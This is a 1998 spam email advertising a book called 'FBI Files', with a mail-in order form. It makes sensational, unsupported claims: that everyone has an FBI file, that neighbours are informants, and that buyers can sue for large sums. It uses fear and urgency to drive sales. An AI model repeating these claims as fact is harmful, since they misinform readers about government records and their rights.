>>>>>>>>Starting Dec. 4, 1998, we are running a TV commercial nationwide for the following offer.  If you snooze, you will lose!  You will also see our ad in newspapers and hear it on the radio.  We expect, at some point, the FBI will knock on our door and tell us to stop selling the book because they are getting too many inquiries.  The huge demand will make it difficult for latecomers to obtain their FBI files.


First about the FBI filing system.  It was created to deter anybody from getting full information.  The FBI uses many record systems.  They created what is called "Main Files" with four classifications:
	* Personal
	* Administrative
	* Applicant (for government employees)
	* Investigative
To further confuse us, the FBI created 210 classification numbers besides the files called "Confidential," "Secret," and "Top Secret."  Here are some of the classification numbers and the categories they stand for:
	#3 - Overthrow or Destruction of the Government
	#5 - Income Tax
	#17 - Veteran Administration Matters
	#23 - Prohibition (Maybe your Grandfather is here.)
	#40 - Passport and Visa Matters
	#47 - Impersonation
	#49 - National Bankruptcy Act
	#64 - Foreign (This one is interesting.  Intelligence information about citizens of foreign countries!)
	#72 - Obstruction of Criminal Justice
	#85 - Home Owner Loan Corporation
	#162 - Interstate Gambling Activities
	#183 - Racketeer-Influenced and Corrupt Organizations (You know this one -- RICO.)
	 
	
There is a specific system of numbering documents.  It was not easy for the investigative team to decipher and decode how the numbering relates to everyone.  Your FBI ID number most likely consists of three sets of numbers. For example:  100-15375-17
	100 - marks the document as part of a domestic security investigation.
	15375 - indicates the document investigation number.  These two sets of numbers together creates a "case number."
	17 - a numeric labeling, but to confuse everyone, it could be an incoming or outgoing document.


But, we have the solution.  An awesome publication, "FBI Files,"  is now available.  As a bonus, we created a letter for you which covers all possible requests so none of the information is missing when you get your file.

Here is how it works.  If you don't ask for it, you don't get it.  That's a LAW!  But, if you know what to ask for, you MUST get it.  That's also a LAW! Our researchers spent twenty years just uncovering what to ask for.

Today, if you ask for your file without being specific, you may be brushed off with questions as to which main file, subfile,  or some very strange, cryptic language and code names such as "Elsurs Logs," "MISUR," "TESUR," "FOIA," Document Classification Reveiw Unit known as "CRU," and so on.

Who has an FBI file?
	* All Criminals
	* Organized Crime Members
	* Government Employees
	* Celebrities
	* Foreigners who became U.S. Citizens
	* All Foreigners with Green Cards
	* Foreign Nationals	
	* Members of Interest Groups
	* Everyone involved in Counter-Intelligence
	* Black Nationalist hate groups
	* Internal Security
	* All Politicians
	* Everyone with any kind of Police Record
	* All Professionals who are fingerprinted for a specific profession -- example, Real Estate Agents
	* All Fugitives
	* Computer Hackers and Flamers

We believe that everyone today has an FBI file and that your future National ID # is going to be your FBI File number!

The book, "FBI Files," gives you detailed information on how you can obtain all files the FBI has on you.  It will also give you information how to obtain the FBI files of other people. The FBI will not release these voluntarily.  You may have to jump through some hoops to get them.  But, under the Freedom of Information Act, you are entitled to get ANY information unless it is subject to national security.

When you receive your files you may be shocked to learn that your local police have a wiretap and surveillance on you.  You find out your neighbor is an FBI informant.  You may even find out your trash was picked up by the FBI and derogatory information was put in your file.

If you ever attended a "politically incorrect" meeting or political rally, you may find your picture in your file. Or if you purchased a book or magazine considered "underground," that information may be in your file. Or your neighbor may have heard you listening to a talk show considered "politcally incorrect" and may have reported you to the authorities.

Does this sound far-fetched?  We wish!  Things like this are happening every day.

Why do you NEED your FBI files?  Your future job or promotion may depend on the information contained in those files!  It is a MUST for you to obtain your files and correct any and all incorrect information before it affects your life!

NOW is the time to order.............................

"FBI Files" is 226 pages of detailed information and instructions. When you read your own FBI files, you may be shocked to learn that your local police have a wiretap and surveillance on you.  You may find out your neighbor is an informant.  You may even find out your garbage was picked up by the FBI and derogatory information put in your file.  By the way, if you find any derogatory information which is not yours but appears in your file, you can sue the government for huge sums of money!


Procrastination on your part may just keep you from being able to get YOUR FBI FILES!  Order now and avoid the rush.
--------------------------------------------------------------------------

Here is how to order:


Our "FBI Files" package is being offered at the Special Promotion price of $24.95 which includes shipping and handling by Priority Mail ($9.95).  You should receive your book within 7-10 days from receipt of order.  

.......Here are the BONUSES for you........
  *You will receive a letter created by our Research Dept. in which you just fill in your Name, Address, Social Security Number, and start searching for your file or files.  Depending on who you are and what may be in your file will be the measurement of how long it will take to receive all the information.  But, eventually, YOU WILL SUCCEED!

  *You will also receive an updated list of FBI field offices in the United States with their addresses.

  *We will also include a special folder in which you can store your information.



You can send us a check (takes at least 5 business days to clear) or money order.  We also accept all major Credit Cards:  Visa, MasterCard, American Express, and Discover. 


Print out the convenient order form below NOW and mail it to:

	World Net Press
	Dept. E-1224
	P.O. Box 96594
	Las Vegas, NV 89193-6594
	
Payment Method:  
_____ Check     
_____ Money Order
_____ Visa
_____ MasterCard
_____ American Express
_____ Discover

_____ Yes, I want to order my copy of the "FBI Files Package" which includes the Bonus letter I can send to the FBI, the updated list of FBI Field Offices, and a special folder for storing my information.  Price is $24.95 which includes shipping and handling by Priority Mail($9.95) and bonuses.


Name_________________________________________________________________________

Address______________________________________________________________________

City/State/Zip_______________________________________________________________

Daytime Phone (__________)___________________________________________________

E-Mail Address_______________________________________________________________

Credit Card #_____________________________________________ Exp. Date_________

Cardholder Name (as it appears on the card)__________________________________

(Please make sure you include your phone number and e-mail address in case we have a question about your order.  Your credit card billing will reflect Road to Wealth, Inc.)

If you are unhappy with "FBI Files," just return the book within 30 days of date of purchase and we will refund the price of the book less shipping and handling and a restocking fee of 15%.



>>>>>>We have many publications and videos with thought-provoking titles available.  If you would like more information, please reply to this message and type MORE INFO in the subject line.  Thank you. >>>>>>>>>>>>>>>>



**************************************************************************
You are receiving this e-mail for one of the following reasons:
a) You are interested the subjects we have to offer.
b) You are on our in-house mailing list.
c) You sent us your offer or contacted us in the past.
d) Someone you know has sent us your e-mail address because they thought you may be interested in what we have to offer.

If this message has reached you in error, or the information is not correct, please accept our apology.  Follow the instructions below to be removed and we will honor your request.  We do not knowingly engage in spam of any kind.

Please click on your reply button and type REMOVE in the SUBJECT LINE ONLY.  The software ignores any message in the body.
**************************************************************************

Please be advised we collect the e-mail addresses of all flamers, hackers, and users of abusive and vulgar language.  We submit these addresses to the FBI and Interpol on a monthly basis.  








